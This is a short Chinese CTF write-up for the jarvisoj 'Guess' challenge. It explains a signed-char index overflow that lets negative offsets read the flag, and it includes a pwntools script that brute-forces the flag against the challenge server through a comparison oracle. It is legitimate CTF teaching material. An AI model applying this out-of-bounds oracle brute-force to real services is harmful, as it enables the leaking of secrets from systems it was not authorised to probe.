jarvisoj——Guess

题目

在这里插入图片描述

Wp

查一下基础项
在这里插入图片描述
这道题卡了很久,实际上最核心的是 char数组 129时=-1

前面这些通过socket进行连接,和主题无关
在这里插入图片描述

看到head可以看到这里才是关键的地方
在这里插入图片描述

看到这里可以知道,实际上就是把bin_by_hex值和flag进行对比
在这里插入图片描述
内存中bin_by_hex和flag相差0x40
在这里插入图片描述
我们可以通过char数组溢出的方法进行查看falg,129=-1,依次类推
然后再对flag进行爆破

from pwn import *
io = remote('pwn.jarvisoj.com', '9878')
#io = process('./source')


#context(log_level = 'debug')
List = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
leak = []
for i in range(50):
    leak.append('0')
    leak.append(chr(128 + 0x40 + i))




flag = 'PCTF{'
for i in range(5, 50):
    for j in List:
        io.recvuntil('>')
        payload = leak
        payload[i*2] = hex(ord(j))[2]
        payload[i*2+1] = hex(ord(j))[3]
        io.sendline(''.join(payload))
        re = io.recvline()
        if re.count('Yaaaay'):
            print(j)
            flag += j
            break
flag += '}'
print(flag)
io.interactive()

参考:https://www.cnblogs.com/zhwer/p/12884433.html

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页